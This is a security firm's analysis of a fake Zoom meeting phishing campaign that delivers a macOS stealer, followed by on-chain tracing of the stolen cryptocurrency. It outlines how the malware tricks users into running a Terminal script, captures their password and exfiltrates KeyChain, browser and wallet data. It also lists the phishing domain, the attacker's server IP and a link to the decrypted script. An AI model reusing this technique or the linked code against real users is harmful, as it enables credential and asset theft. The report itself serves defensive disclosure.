Seeing is Deceiving | Analysis of Fake Zoom Meeting Phishing Attack
Author | Reborn, Lisa
Editor | Liz
Background
Recently, several users on X reported a phishing attack disguised as Zoom meeting links. In one case, a victim installed malicious software after clicking on a fake Zoom meeting link, resulting in the theft of cryptocurrency assets worth millions of dollars. Against this backdrop, the SlowMist security team conducted an analysis of this type of phishing incident and attack method while tracing the hackers’ fund flows.
Phishing Link Analysis
The attacker used a domain resembling “app[.]us4zoom[.]us” to impersonate a legitimate Zoom meeting link. The webpage closely mimicked the genuine Zoom meeting interface. When users clicked the “Launch Meeting” button, it triggered the download of a malicious installation package instead of launching the local Zoom client.
By probing the aforementioned domain, we discovered the attacker’s monitoring log address: (https[:]//app[.]us4zoom[.]us/error_log).
Decryption revealed that this is a log entry of a script attempting to send messages via the Telegram API, with the language used being Russian.
The site was deployed 27 days ago, and the hackers are likely Russian. Since November 14, they have been targeting victims and using the Telegram API to monitor whether anyone clicked the download button on the phishing page.
Malware Analysis
The malicious installation package is named “ZoomApp_v.3.14.dmg.” Upon opening the Zoom phishing software, users are tricked into executing the malicious script ZoomApp.file in Terminal. During the execution process, the software further prompts users to enter their system password.
Below is the execution content of the malicious file:
After decoding the above content, it was revealed to be a malicious osascript script.
Further analysis revealed that the script searches for a hidden executable file named “.ZoomApp” and runs it locally. A disk analysis of the original installation package, “ZoomApp_v.3.14.dmg,” confirmed the presence of a hidden executable file named “.ZoomApp.”
Malicious Behavior Analysis
Static Analysis
We uploaded the binary file to a threat intelligence platform for analysis and found that the file had already been flagged as malicious.
Through static disassembly analysis, the following image shows the entry code of the binary file, which is used for data decryption and script execution.
The following image shows the data section, where most of the information is encrypted and encoded.
After decrypting the data, it was discovered that the binary file ultimately executes a malicious osascript script (the full decrypted code is shared here: https://pastebin.com/qRYQ44xa). This script collects information from the user's device and sends it to the backend.
The following image shows part of the code that enumerates different plugin ID paths.
The following image shows part of the code that reads information from the computer’s KeyChain.
After the malicious code collects system information, browser data, cryptocurrency wallet data, Telegram data, Notes data, and Cookie data, it compresses the gathered information and sends it to a server controlled by the hacker (141.98.9.20).
Since the malicious program prompts the user to input their password during execution, and subsequent malicious scripts collect KeyChain data from the computer (which may contain various passwords stored on the device), the hacker will attempt to decrypt the data after collecting it. This allows the hacker to gain access to sensitive information such as the user’s wallet mnemonic phrase and private key, ultimately leading to the theft of the user’s assets.
Analysis shows that the hacker’s server IP address is located in the Netherlands and has currently been flagged as malicious by threat intelligence platforms.
Dynamic Analysis
The malicious program was executed in a virtual environment for dynamic analysis, and the process was monitored. Below is the process information showing how the malicious program collects local data and sends it to the attacker’s backend server.
MistTrack Analysis
We used the on-chain tracking tool MistTrack to analyze the hacker’s address provided by the victim: 0x9fd15727f43ebffd0af6fecf6e01a810348ee6ac. The hacker address has profited over 1 million USD, including USD0++, MORPHO, and ETH. Among them, USD0++ and MORPHO were swapped to 296 ETH.
According to MistTrack, the hacker’s address received small ETH transfers from the address 0xb01caea8c6c47bbf4f4b4c5080ca642043359c2e, which is suspected to be providing transaction fees for the hacker’s address. The address (0xb01c) has only one source of income but transfers small amounts of ETH to nearly 8,800 addresses, suggesting it may be a “platform dedicated to providing transaction fees.”
By filtering the addresses to which 0xb01c transferred funds, we identified two addresses marked as malicious, one of which is tagged as “Pink Drainer.” Further analysis of these two phishing addresses reveals that the funds were primarily transferred to ChangeNOW and MEXC.
Further analysis of the stolen funds’ transfer reveals that a total of 296.45 ETH was moved to a new address: 0xdfe7c22a382600dcffdde2c51aaa73d788ebae95.
The first transaction of the new address (0xdfe7) occurred in July 2023, involving multiple chains. The current balance of the address is 32.81 ETH.
The main ETH transfer paths from the new address (0xdfe7) are as follows:
- 200.79 ETH -> 0x19e0…5c98f
- 63.03 ETH -> 0x41a2…9c0b
- 8.44 ETH -> Exchanged for 15,720 USDT
- 14.39 ETH -> Gate.io
The subsequent transfers from the expanded addresses are associated with multiple platforms such as Bybit, Cryptomus.com, Swapspace, Gate.io, and MEXC. These transfers also link to multiple addresses flagged by MistTrack as “Angel Drainer” and “Theft.” Additionally, there is currently 99.96 ETH remaining in the address 0x3624169dfeeead9f3234c0ccd38c3b97cecafd01.
The new address (0xdfe7) also shows a significant number of USDT transactions, with funds being transferred to platforms such as Binance, MEXC, FixedFloat, and others.
Summary
This phishing method involves hackers disguising a link as a legitimate Zoom meeting invitation, tricking users into downloading and executing malicious software. The malware typically has multiple harmful functions, including collecting system information, stealing browser data, and accessing cryptocurrency wallet information, which is then transmitted to servers controlled by the hackers. These types of attacks often combine social engineering and Trojan techniques, making users vulnerable to exploitation. The SlowMist Security Team advises users to carefully verify meeting links before clicking, avoid executing unknown software and commands, install antivirus software, and update it regularly. For more security tips, check out the Blockchain Dark Forest Selfguard Handbook by SlowMist Security Team: https://github.com/slowmist/Blockchain-dark-forest-selfguard-handbook/blob/main/README_CN.md
About SlowMist
SlowMist is a blockchain security firm established in January 2018. The firm was started by a team with over ten years of network security experience to become a global force. Our goal is to make the blockchain ecosystem as secure as possible for everyone. We are now a renowned international blockchain security firm that has worked on various well-known projects such as HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, etc.
SlowMist offers a variety of services that include but are not limited to security audits, threat information, defense deployment, security consultants, and other security-related services. We also offer AML (Anti-money laundering) software, MistEye (Security Monitoring) , SlowMist Hacked (Crypto hack archives), FireWall.x (Smart contract firewall) and other SaaS products. We have partnerships with domestic and international firms such as Akamai, BitDefender, RC², TianJi Partners, IPIP, etc. Our extensive work in cryptocurrency crime investigations has been cited by international organizations and government bodies, including the United Nations Security Council and the United Nations Office on Drugs and Crime.
By delivering a comprehensive security solution customized to individual projects, we can identify risks and prevent them from occurring. Our team was able to find and publish several high-risk blockchain security flaws. By doing so, we could spread awareness and raise the security standards in the blockchain ecosystem.
